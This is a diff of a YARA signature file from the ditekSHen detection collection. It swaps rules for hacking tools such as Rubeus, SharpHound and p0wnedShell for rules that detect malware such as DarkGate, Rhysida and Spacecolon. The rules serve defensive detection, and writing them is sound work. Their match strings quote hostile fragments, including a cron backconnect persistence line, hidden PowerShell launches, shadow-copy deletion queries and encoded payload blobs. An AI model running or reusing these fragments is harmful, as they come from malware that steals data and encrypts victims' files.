+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10705-L10725"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "78c2a435762d3febe927eb15910d5a18c1ffe74604673463543d3c859f5ef8e9"
+		logic_hash = "9d44ad2a3c270eed0e905402e8c32dcca54da90f4229d9d59874ee09b3b47277"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Linux.Trojan.GetShell"
 
 	strings:
-		$s1 = "[+] SMB Touch started" fullword ascii
-		$s2 = "[-] Could not connect to share (0x%08X - %s)" fullword ascii
-		$s3 = "[!] Target could be either SP%d or SP%d," fullword ascii
-		$s4 = "[!] for these SMB exploits they are equivalent" fullword ascii
-		$s5 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
-		$s6 = "[+] Touch completed successfully" fullword ascii
-		$s7 = "Network error while determining exploitability" fullword ascii
-		$s8 = "Named pipe or share required for exploit" fullword ascii
-		$w1 = "UsingNbt" fullword ascii
-		$w2 = "TargetPort" fullword ascii
-		$w3 = "TargetIp" fullword ascii
-		$w4 = "RedirectedTargetPort" fullword ascii
-		$w5 = "RedirectedTargetIp" fullword ascii
-		$w6 = "NtlmHash" fullword ascii
-		$w7 = "\\PIPE\\LANMAN" fullword ascii
-		$w8 = "UserRejected: " fullword ascii
+		$x1 = "cat <(echo '@reboot echo socks5_backconnect" ascii
+		$x2 = "(cd  && )') <(sed '/socks5_backconnect" ascii
+		$s1 = "cat <(echo '@" ascii
+		$s2 = "(cd  && )') <(sed '" ascii
+		$s3 = "PORT1:" ascii
+		$s4 = "HOST1:" ascii
+		$s5 = "queryheader" ascii
+		$s6 = "qsectionpost" ascii
+		$s7 = "packedip" ascii
+		$s8 = "copydata" ascii
+		$s9 = "synsend" ascii
+		$s10 = "bc_connect" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or all of ( $w* ) )
+		uint16( 0 ) == 0x457f and ( ( all of ( $x* ) and 1 of ( $s* ) ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Nbtscan : FILE
+rule DITEKSHEN_MALWARE_Win_Solarmarker : FILE
 {
 	meta:
-		description = "Detects NBTScan scanner for open NETBIOS nameservers on a local or remote TCP/IP network"
+		description = "Detects SolarMarker"
 		author = "ditekSHen"
-		id = "663c324e-4784-5efe-bbdf-60fa42e13944"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "78c2f739-76b2-5a80-8b9a-6c677d578eaa"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L402-L420"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10727-L10745"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a81b95ad60aac4d66586ae7dc61f6bcbe2b7185b66b2bb895f45abff3ad3f430"
+		logic_hash = "84182c8948c2f40439cd932885ae8b88bb677ecc9fba366f22d30e13dc4ffb68"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "[%s] is an invalid target (bad IP/hostname)" fullword ascii
-		$s2 = "ERROR: no parse for %s -- %s" fullword ascii
-		$s3 = "add_target failed" fullword ascii
-		$s4 = "   -p <n>    bind to UDP Port <n> (default=%d)" fullword ascii
-		$s5 = "process_response.c" fullword ascii
-		$s6 = "currTarget != 0" fullword ascii
-		$s7 = "parse_target.c" fullword ascii
-		$s8 = "dump_packet.c" fullword ascii
-		$s9 = "parse_target_cb.c" fullword ascii
-		$s10 = "DUMP OF PACKET" fullword ascii
-		$s11 = "lookup_hostname.c" fullword ascii
+		$x1 = "token_type" fullword ascii
+		$x2 = "request_data" fullword ascii
+		$x3 = "request_timeout" fullword ascii
+		$x4 = { 74 6f 6b 65 6e 73 00 66 72 6f 6d 00 74 6f 00 73 5f (66|72) }
+		$s1 = "set_UseShellExecute" fullword ascii
+		$s2 = "<Select>b__0" fullword ascii
+		$s3 = "<get>b__e" fullword ascii
+		$s4 = "<get>b__10" fullword ascii
+		$s5 = "<get>b__f" fullword ascii
+		$s6 = "<set>b__0" fullword ascii
+		$s7 = "<set>b__1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) and 4 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENC_Bestcrypt : FILE
+rule DITEKSHEN_MALWRE_Win_Darkgate : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software"
+		description = "Detects DarkGate infostealer and coinminer"
 		author = "ditekSHen"
-		id = "30c3c17c-c951-5b14-80ba-eec7b2195985"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "4488e1e6-daac-5832-8326-3151c834daf1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L442-L453"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10747-L10771"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77d338c6f3e4b733cb31eb1ae05e4ce8631812f7161bc70074a3fe1dee9df770"
+		logic_hash = "805a04bbb3915d539e76927393384a2786c25490e8b9fc151d5b12415247578b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "BestCrypt Volume Encryption" wide
-		$s2 = "BCWipe for " wide
-		$s3 = "Software\\Jetico\\BestCrypt" wide
-		$s4 = "%c:\\EFI\\Jetico\\" fullword wide
+		$x1 = "SYSTEM Elevation: Completed, new DarkGate connection with SYSTEM privileges" ascii
+		$x2 = "-u 0xDark" ascii
+		$x3 = "DarkGate" ascii
+		$x4 = "/c cmdkey /generic:\"127.0.0.2\" /user:\"SafeMode\" /pass:\"darkgatepassword0\"" ascii
+		$s1 = "c:\\temp\\crash.txt" ascii
+		$s2 = "/cookiesfile \"" ascii
+		$s3 = "/c rmdir /s /q \"" ascii
+		$s4 = "/c xcopy /E /I /Y \"%s\" \"%s\" && exit" ascii
+		$s5 = "U_MemScan" ascii
+		$s6 = "U_Google_AD" ascii
+		$s7 = "untBotUtils" ascii
+		$s8 = "____padoru____" ascii
+		$s9 = "u_SysHook" ascii
+		$s10 = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" ascii
+		$s11 = "C:\\Windows\\System32\\ntdll.dll" fullword ascii
+		$s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii
+		$s13 = /Stub: (WARNING:|Configuration updated:|Global Ping Invoked)/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) ) ) or ( 10 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Earthworm : FILE
+rule DITEKSHEN_MALWARE_Win_Rookie_Downloader : FILE
 {
 	meta:
-		description = "Detects Earthworm C&C Windows/macOS tool"
+		description = "Detect malware downlaoder, variant of ZombieBoy downloader"
 		author = "ditekSHen"
-		id = "4a6edcf3-b3c4-5620-8eac-102b1ce425f8"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "a991eecb-5275-5e33-bea4-e709590474a8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L455-L471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10773-L10786"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5045faaaa9e60d4bd506240d51ff78dad4e89ccee0e824e7e5c309a8d3ae2883"
+		logic_hash = "6d5625c2cd7e3a51c2fce9948e691ff2d1b7cf85083708790f89e15c6522059b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.RookIE-Downloader"
 
 	strings:
-		$s1 = "lcx_tran 0.0.0.0:%d <--[%4d usec]--> %s:%d" fullword ascii
-		$s2 = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server" fullword ascii
-		$s3 = "rcsocks 0.0.0.0:%d <--[%4d usec]--> 0.0.0.0:%d" fullword ascii
-		$s4 = "rssocks %s:%d <--[%4d usec]--> socks server" fullword ascii
-		$s5 = "--> %3d <-- (close)used/unused  %d/%d" fullword ascii
-		$s6 = "<-- %3d --> (open)used/unused  %d/%d" fullword ascii
-		$s7 = "--> %d start server" ascii
-		$s8 = "Error on connect %s:%d [proto_init_cmd_rcsocket]" fullword ascii
-		$url = "http://rootkiter.com/EarthWrom/" nocase fullword ascii
+		$s1 = "shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}" fullword ascii
+		$s2 = "taskkill /f /im hh.exe" fullword ascii
+		$s3 = "RookIE/1.0" fullword ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" fullword ascii
+		$s5 = "#32770" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xfacf or uint16( 0 ) == 0x5a4d ) and ( 5 of ( $s* ) or $url )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Keychaindumper : FILE
+rule DITEKSHEN_MALWARE_Win_Fiber : FILE
 {
 	meta:
-		description = "Detects macOS certificate/password keychain dumping tool"
+		description = "Detects Fiber .NET injector"
 		author = "ditekSHen"
-		id = "cec094fa-c651-58a6-a306-f16d8603e536"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "0e562e2e-cb91-5acf-bb8f-5e7e7d971a3d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L473-L484"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10788-L10824"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f606bdd5dba2180ffc552c46373b52801a0bd65a538b381fb9f4240efc5bd458"
+		logic_hash = "bd6c2c02272fe59c8d7de533197f15d94b5532d32875f01e3e4bd52506456a34"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "INDICATOR_Osx.Tool.PWS.KeychainDumper"
 
 	strings:
-		$s1 = "_getEmptyKeychainItemString" fullword ascii
-		$s2 = "NdumpKeychainEntitlements" fullword ascii
-		$s3 = "_dumpKeychainEntitlements" fullword ascii
+		$x1 = "Fiber.dll" fullword ascii
+		$s1 = "-WindowStyle Hidden Copy-Item -Path *.vbs -Destination" wide
+		$s2 = "-WindowStyle Hidden {0} -WindowStyle Hidden Start-Sleep 5; Start-Process {1}" wide
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s4 = "WScript.Shell" fullword wide
+		$s5 = "{0}_{1:N}.lnk" fullword wide
+		$s6 = "notepad.exe,0" fullword wide
+		$i1 = "AppLaunch.exe" fullword wide
+		$i2 = "aspnet_regbrowsers.exe" fullword wide
+		$i3 = "cvtres.exe" fullword wide
+		$i4 = "ilasm.exe" fullword wide
+		$i5 = "jsc.exe" fullword wide
+		$i6 = "MSBuild.exe" fullword wide
+		$i7 = "RegAsm.exe" fullword wide
+		$i8 = "RegSvcs.exe" fullword wide
+		$v1 = "is tampered" wide
+		$v2 = "Debugger Detected" wide
+		$v3 = "RepositoryUrl" ascii
+		$v4 = { 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00
+                74 00 75 00 61 00 6c 00 20 00 00 0b 41 00 6c 00
+                6c 00 6f 00 63 00 00 0d 57 00 72 00 69 00 74 00
+                65 00 20 00 00 11 50 00 72 00 6f 00 63 00 65 00
+                73 00 73 00 20 00 00 0d 4d 00 65 00 6d 00 6f 00
+                72 00 79 00 00 0f 50 00 72 00 6f 00 74 00 65 00
+                63 00 74 00 00 0b 4f 00 70 00 65 00 6e 00 20 00
+                00 0f 50 00 72 00 6f 00 63 00 65 00 73 00 73 00
+                00 0d 43 00 6c 00 6f 00 73 00 65 00 20 00 00 0d
+                48 00 61 00 6e 00 64 00 6c 00 65 00 00 0f 6b 00
+                65 00 72 00 6e 00 65 00 6c }
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf ) and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) and 2 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) or ( 2 of ( $s* ) and 6 of ( $i* ) ) or ( 1 of ( $x* ) and 3 of ( $v* ) ) or ( all of ( $v* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_P0Wnedshell : FILE
+rule DITEKSHEN_MALWARE_Win_Unknown_Packedloader_01 : FILE
 {
 	meta:
-		description = "Detects compiled executables of p0wnedShell post-exploitation toolkit"
-		author = "ditekSHen"
-		id = "7df8f9b4-48d3-5271-9d60-5dd4bfaed316"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects unknown loader / packer. Observed running LummaStealer"
+		author = "ditekShen"
+		id = "2969090f-dff9-5745-b87d-a031741dd2e0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L486-L512"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10826-L10845"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9745b69573bf695fdada122143fb1889a7b2025250b5fb1e8f1a86b3be6f27d3"
+		logic_hash = "6fd9075793b55e04c68bb13d21b88741889a9c37a0a9d1a19d895c7b68af4506"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Use WinRM, PsExec, SMB/WMI to execute commands on remote systems" wide
-		$s2 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" wide
-		$s3 = "-Command '\"lsadump::dcsync /user:" wide
-		$s4 = "-Payload windows/meterpreter/reverse_https -Lhost" wide
-		$s5 = "Get-Content ./EncodedPayload.bat" fullword wide
-		$e1 = "OnYNAB+LCAAAAAAABAC8vOeS60iSLvh75yly+rZZVxuqC4KQs3uvLQhFEJIACALoHVuD1oKQBMbuuy+Y4pw8dUTf3R+bZlWVZHh87uHh4vPItv63ZGrCMW+bF7GZ2zL+" wide
-		$e2 = "kuIeAB+LCAAAAAAABADsvWt327iuMPw9v0Jv27Wa7DqJc2ma5nl71vZFTpzx/ZJL+3TlyLZiq7EtjyTHcffZ//0BSEqiKEqWbKczs8941qS2LgAIAiAIguDjfNp3DHOq" wide
-		$e3 = "mZYIAB+LCAAAAAAABADsvflj2zyOMPx7/gptmnftbBIfuZp0t/OOfMZp7PjO0adfX9lSbCWy5Vp2HGfm+d8/ACQl6vCRNp2Z3bVmnioWSRAEQQAESfC/Pmwp8FTtmTFu" wide
-		$e4 = "u9YGAB+LCAAAAAAABADsvW1D40ayKPw9v0Lr4V7ZE8vY5mUY9rKJBzMTnmWAgyGTvYTlCluAdmzJK9nDsEn++1NV/S61ZJmXZJIN52wG7O7q6urq6qrqquoXSfDveZgE" wide
-		$e5 = "T3gDAB+LCAAAAAAABADtvX1f2zq2KPz3yafQzuZcwi5JEydQ2nM7v4cCnc0zQLmE7j3z6+7NmMQBnwY7YzsFTqff/WpJsi3Jki07DlA2mT008ctaS0tL601L0nThjSPX" wide
-		$e6 = "zRgDAB+LCAAAAAAABADtfW1327jR6OdHv4Kr9TmWdiVZkl+SdZs913Gcrm9tx7WcbvekuS4t0TYbiVRJKYmfbf77xeCNeCVBinKcbNStI5HAYDAYDAaDwczNMhovwjjy" wide
-		$e7 = "pxICAB+LCAAAAAAABADtvf17GkeyKPyz+Cvmlfw+ggRhfcXr1X1znsUIx5yVhC7IUbI+fnUHGKRZwww7M1jWyeZ/v1XV3z09wABysnviZ1cBpqe6urqquqq6uno8j4ZZ" wide
-		$e8 = "H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5" wide
-		$k1 = "EasySystemPPID" fullword ascii
-		$k2 = "EasySystemShell" fullword ascii
-		$k3 = "LatMovement" fullword ascii
-		$k4 = "ListenerURL" fullword ascii
-		$k5 = "MeterStager" fullword ascii
-		$k6 = "PatchEventLog" fullword ascii
+		$s1 = "Error at hooking API \"%S\"" wide
+		$s2 = "Dumping first %d bytes:" wide
+		$s3 = "Error at initialization of bundled DLL: %s" wide
+		$s4 = "GetMemoryForDLL()" ascii
+		$s5 = "type=activation&code=" ascii
+		$s6 = "activation.php?code=" ascii
+		$s7 = "&hwid=" ascii
+		$s8 = "&hash=" ascii
+		$s9 = "type=deactivation&hash=" ascii
+		$s10 = "deactivation.php?hash=" ascii
+		$s11 = "BANNED" fullword ascii
+		$s12 = "GetAdaptersInfo" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 7 of ( $e* ) or all of ( $k* ) or ( 2 of ( $s* ) and 2 of ( $e* ) and 2 of ( $k* ) ) )
+		uint16( 0 ) == 0x5a4d and 11 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Rubeus : FILE
+rule DITEKSHEN_MALWARE_Win_LOLKEK : FILE
 {
 	meta:
-		description = "Detects Rubeus kerberos defensive/offensive toolset"
-		author = "ditekSHen"
-		id = "5af8cee0-e664-5dfe-9932-0e74ed41b6b4"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects LOLKEK / GlobeImposter ransowmare"
+		author = "ditekShen"
+		id = "96374c8d-2ef7-5706-a96f-27d60f73f8c1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L514-L531"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10847-L10864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee817d23427970d7e77f9ce2a7cbc25c77177d81354fed83e7551cdcbc2d7cd2"
+		logic_hash = "047492f8b7b56c75cfdcc4359de2b02a76cf9591b902171785806987e552995a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" fullword wide
-		$s2 = "(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" fullword wide
-		$s3 = "rc4opsec" fullword wide
-		$s4 = "pwdlastset" fullword wide
-		$s5 = "LsaEnumerateLogonSessions" fullword ascii
-		$s6 = "extractKerberoastHash" fullword ascii
-		$s7 = "ComputeAllKerberosPasswordHashes" fullword ascii
-		$s8 = "kerberoastDomain" fullword ascii
-		$s9 = "GetUsernamePasswordTGT" fullword ascii
-		$s10 = "WriteUserPasswordToFile" fullword ascii
+		$s1 = "$Recycle.bin" fullword wide
+		$s2 = "\\\\?\\%c:" fullword wide
+		$s3 = ".MMM" fullword wide
+		$s4 = "ReadMe.txt" fullword wide
+		$s5 = "select * from Win32_ShadowCopy" fullword wide
+		$s6 = "Win32_ShadowCopy.ID='%s'" fullword wide
+		$s7 = "W3CRYPTO LOCKER" ascii
+		$s8 = "http://mmcb" ascii
+		$s9 = "yip.su/2QstD5" ascii
+		$s10 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_RTK_Hiddenrootkit : FILE
+rule DITEKSHEN_MALWARE_Win_Spacecolon : FILE
 {
 	meta:
-		description = "Detects the Hidden public rootkit"
+		description = "Detects Spacecolon ransomware"
 		author = "ditekSHen"
-		id = "c9e9d160-224f-505f-a135-56a9793f99c2"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "38bde0b6-96a3-5081-b152-c251d7a2ffac"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L533-L554"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10866-L10886"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20180fc040c1b988b17b1ca9b61a7dab5180df4961a00f0afcb03e2cbe99b28f"
+		logic_hash = "d6e55c45f9df98bc152dadc1ba0953b4b89b5a503af0fc5ba53e12a1aa4f6d28"
 		score = 75
-		quality = 50
+		quality = 48
 		tags = "FILE"
 
 	strings:
-		$h1 = "Hid_State" fullword wide
-		$h2 = "Hid_StealthMode" fullword wide
-		$h3 = "Hid_HideFsDirs" fullword wide
-		$h4 = "Hid_HideFsFiles" fullword wide
-		$h5 = "Hid_HideRegKeys" fullword wide
-		$h6 = "Hid_HideRegValues" fullword wide
-		$h7 = "Hid_IgnoredImages" fullword wide
-		$h8 = "Hid_ProtectedImages" fullword wide
-		$s1 = "FLTMGR.SYS" fullword ascii
-		$s2 = "HAL.dll" fullword ascii
-		$s3 = "\\SystemRoot\\System32\\csrss.exe" fullword wide
-		$s4 = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\%wZ" fullword wide
-		$s5 = "INIT" fullword ascii
-		$s6 = "\\hidden-master\\Debug\\QAssist.pdb" fullword ascii
+		$s1 = "eraseext" fullword ascii
+		$s2 = "*.encrypted" fullword ascii
+		$s3 = "TIMATOMA#" fullword wide
+		$s4 = ".Encrypted" fullword wide
+		$s5 = "Already Encrypted" wide
+		$s6 = "note.txt" fullword wide
+		$s7 = "HOW TO RECOVERY FILES.TXT" fullword wide
+		$s8 = "taskkill /f /im \"" wide nocase
+		$s9 = "\\kill.bat" wide
+		$s10 = "Search cancelled -" fullword wide
+		$s11 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" fullword wide
+		$s12 = "Our TOX ID :" ascii
+		$s13 = "tufhackteam@gmail.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $h* ) or 5 of ( $s* ) or ( 2 of ( $s* ) and 2 of ( $h* ) ) )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharphound : FILE
+rule DITEKSHEN_MALWARE_Win_Rhysida : FILE
 {
 	meta:
-		description = "Detects BloodHound"
+		description = "Detects Rhysida ransomware"
 		author = "ditekSHen"
-		id = "d8f44e15-3e7c-5e5d-9d74-30c61e679fcb"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "a70bdf19-3b56-5dc0-be74-20a2e85099cc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L556-L573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10888-L10902"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bdf10d0aabd6c41e8dd1f87c0fa141f300d785146d059fcd301ec35f65fbe990"
+		logic_hash = "fb15f497cdee40b237dfc2aafcde2da95ff2a6f9c162273862ec1a0053269932"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$id1 = "InvokeBloodHound" fullword ascii
-		$id2 = "Sharphound" ascii nocase
-		$s1 = "SamServerExecute" fullword ascii
-		$s2 = "get_RemoteDesktopUsers" fullword ascii
-		$s3 = "commandline.dll.compressed" ascii wide
-		$s4 = "operatingsystemservicepack" fullword wide
-		$s5 = "LDAP://" fullword wide
-		$s6 = "wkui1_logon_domain" fullword ascii
-		$s7 = "GpoProps" fullword ascii
-		$s8 = "a517a8de-5834-411d-abda-2d0e1766539c" fullword ascii nocase
+		$s1 = "cmd.exe /c reg add \"HK" ascii
+		$s2 = "rundll32.exe user32.dll,UpdatePerUserSystemParameters" fullword ascii
+		$s3 = "C:/Users/Public/bg.jpg" fullword ascii
+		$s4 = "CriticalBreachDetected.pdf" fullword ascii
+		$s5 = "rhysida" ascii
+		$s6 = "cmd.exe /c reg delete \"HKCU\\Cont" ascii
+		$s7 = "Rhysida-" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) or ( 3 of ( $s* ) and #s1 > 5 )
 }
-rule DITEKSHEN_INDICATOR_TOOL_UAC_NSISUAC : FILE
+rule DITEKSHEN_MALWARE_Win_Povertystealer : FILE
 {
 	meta:
-		description = "Detects NSIS UAC plugin"
+		description = "Detects PovertyStealer"
 		author = "ditekSHen"
-		id = "4a7c20f6-bf0e-55fb-a0b9-7b51e4af7cd3"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "a431b82a-81cb-51a9-b3a8-61d71f36a60e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L575-L587"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10904-L10917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48c0247c789328a0ff62816f5d6ecac7a0f2a3fe2cb95d99c0e7d988147f7137"
+		logic_hash = "0d8a4dd1f3a9935935878840d19e16d91d240da776f99eb2dd3f12df96efa1d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.PovertyStealer"
 
 	strings:
-		$s1 = "HideCurrUserOpt" fullword wide
-		$s2 = "/UAC:%X /NCRC%s" fullword wide
-		$s3 = "2MyRunAsStrings" fullword wide
-		$s4 = "CheckElevationEnabled" fullword ascii
-		$s5 = "UAC.dll" fullword ascii
+		$x1 = "Poverty is the parent of crime." ascii
+		$s2 = "OperationSystem: %d:%d:%d" ascii
+		$s3 = "ScreenSize: {lWidth=%d, lHeight=%d}" ascii
+		$s4 = "VideoAdapter #%d: %s" ascii
+		$s5 = "$d.log" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		(( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) ) ) or all of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_REM_Intelliadmin : FILE
+rule DITEKSHEN_MALWARE_Win_Janelarat : FILE
 {
 	meta:
-		description = "Detects commerical IntelliAdmin remote tool"
+		description = "Detects JanelaRAT"
 		author = "ditekSHen"
-		id = "15385e0b-ead4-5614-a04e-55878eb70b34"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "6a49eeda-307f-5429-aa24-658223360239"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L589-L602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10919-L10939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b601d68eff65bc6cc2fb46630a7021e229764f9a80f6d3278ba3b9f55e5b114"
+		logic_hash = "9f10112b6ffa382b03511e7b6c8757438d5910ee2c24d650d05bb53abfff3860"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
